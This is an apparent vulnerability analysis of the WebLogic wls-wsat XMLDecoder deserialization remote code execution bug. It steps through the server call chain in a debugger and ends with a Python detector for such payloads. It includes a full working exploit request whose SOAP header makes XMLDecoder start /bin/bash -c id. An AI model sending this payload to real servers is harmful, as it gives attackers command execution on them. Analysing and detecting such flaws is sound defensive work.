Set a breakpoint at line 129 of weblogic.wsee.jaxws.WLSServletAdapter:
if (var2.getMethod().equals("GET") || var2.getMethod().equals("HEAD")) {
Then start debug mode, send the request, and capture the request packet at the breakpoint.
Contents of the Burp request:
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: localhost:7001
Content-Type: text/xml
Content-Length: 987

<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>id</string>
            </void>
          </array>
          <void method="start" />
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body />
</soapenv:Envelope>
Call chain (read from bottom to top):
processRequest:43, WorkContextServerTube (weblogic.wsee.jaxws.workcontext)
__doRun:866, Fiber (com.sun.xml.ws.api.pipe)
_doRun:815, Fiber (com.sun.xml.ws.api.pipe)
doRun:778, Fiber (com.sun.xml.ws.api.pipe)
runSync:680, Fiber (com.sun.xml.ws.api.pipe)
process:403, WSEndpointImpl$2 (com.sun.xml.ws.server)
handle:539, HttpAdapter$HttpToolkit (com.sun.xml.ws.transport.http)
handle:253, HttpAdapter (com.sun.xml.ws.transport.http)
handle:140, ServletAdapter (com.sun.xml.ws.transport.http.servlet)
handle:171, WLSServletAdapter (weblogic.wsee.jaxws)
run:708, HttpServletAdapter$AuthorizedInvoke (weblogic.wsee.jaxws)
doAs:363, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:146, SecurityManager (weblogic.security.service)
authenticatedInvoke:103, ServerSecurityHelper (weblogic.wsee.util)
run:311, HttpServletAdapter$3 (weblogic.wsee.jaxws)
post:336, HttpServletAdapter (weblogic.wsee.jaxws)
doRequest:99, JAXWSServlet (weblogic.wsee.jaxws)
service:99, AbstractAsyncServlet (weblogic.servlet.http)
service:820, HttpServlet (javax.servlet.http)
run:227, StubSecurityHelper$ServletServiceAction (weblogic.servlet.internal)
invokeServlet:125, StubSecurityHelper (weblogic.servlet.internal)
execute:301, ServletStubImpl (weblogic.servlet.internal)
execute:184, ServletStubImpl (weblogic.servlet.internal)
wrapRun:3732, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
run:3696, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
doAs:321, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:120, SecurityManager (weblogic.security.service)
securedExecute:2273, WebAppServletContext (weblogic.servlet.internal)
execute:2179, WebAppServletContext (weblogic.servlet.internal)
run:1490, ServletRequestImpl (weblogic.servlet.internal)
execute:256, ExecuteThread (weblogic.work)
run:221, ExecuteThread (weblogic.work)
Breakpoint at line 129 of weblogic.wsee.jaxws.WLSServletAdapter.
Now continue stepping.
Since ours is a POST request, this GET/HEAD condition can obviously be skipped with F8; there is no need to step into it.
We arrive at super.handle(var1, var2, var3);
Step into it.
It returns true only after the Content-Type matches text/xml.
Next we enter a for loop in com.sun.xml.ws.api.pipe.Fiber.
Inside this loop it is mainly the value of this.next that changes.
It keeps looping until this.next becomes WorkContextServerTube, which is the class that actually triggers the vulnerability.
Finally we reach the readHeaderOld function, and this is where the real work begins.
Look at var1: it is the body of our POST request.
Follow into this.readHeaderOld(var3);
Inspect var4: var4 has now been assigned the part of the POST body that actually gets executed, i.e. everything from the opening <java> tag to the closing </java> tag.
That Java fragment is then used to instantiate the WorkContextXmlInputAdapter class.
The var4.toByteArray() call here also explains why, in 2725, a PoC can be generated using the byte type.
This is the real low-level trigger point.
There is no filtering whatsoever, so the RCE executes. That concludes this brief analysis of 10271.
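As an added defender-side illustration (not code from the original post or from WebLogic): a small Python check that applies element-level filtering to the WorkContext header before it would ever reach XMLDecoder, run against the request captured above and against a constructed benign header. The rule set (refuse object/new/method/class elements, void elements with anything other than an index attribute, and non-byte arrays) is this example's own assumption about what a plain WorkContext value needs.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"

# XMLDecoder constructs that build objects or invoke methods. A WorkContext
# header is only expected to carry plain values, so these are refused.
# (Rule set is this example's assumption, not WebLogic's own code.)
FORBIDDEN_ELEMENTS = {"object", "new", "method", "class"}

def _local_name(tag):
    # ElementTree tags look like "{namespace}local"
    return tag.rsplit("}", 1)[-1]

def inspect_work_context(soap_xml):
    """Return a list of findings for one SOAP request; empty means clean."""
    findings = []
    try:
        root = ET.fromstring(soap_xml)
    except ET.ParseError as exc:
        return ["unparseable SOAP envelope: %s" % exc]
    header = root.find("{%s}Header" % SOAP_NS)
    if header is None:
        return findings
    for ctx in header.iter("{%s}WorkContext" % WORK_NS):
        for el in ctx.iter():
            name = _local_name(el.tag)
            if name in FORBIDDEN_ELEMENTS:
                findings.append("forbidden XMLDecoder element <%s>" % name)
            elif name == "void":
                # <void index="n"> only fills an array slot; a class= or
                # method= attribute constructs an object or calls a method
                extra = sorted(a for a in el.attrib if a != "index")
                if extra:
                    findings.append("<void> with attribute(s) %s" % extra)
            elif name == "array":
                cls = el.get("class")
                if cls is not None and cls.lower() != "byte":
                    findings.append('<array class="%s"> is not a byte array' % cls)
    return findings

# Constructed sample: the WorkContext header from the request captured above.
MALICIOUS_REQUEST = """<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 <soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  <java version="1.8.0_131" class="java.beans.XMLDecoder">
   <void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3">
    <void index="0"><string>/bin/bash</string></void>
    <void index="1"><string>-c</string></void>
    <void index="2"><string>id</string></void>
   </array><void method="start"/></void>
  </java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

# Constructed sample: a header carrying only a plain string value.
BENIGN_REQUEST = MALICIOUS_REQUEST.split("<java")[0] + \
    '<java class="java.beans.XMLDecoder"><string>tenant-a</string></java>' \
    "</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"
```

Running inspect_work_context on MALICIOUS_REQUEST yields three findings (the class= void, the String array, and the method= void), while BENIGN_REQUEST yields none.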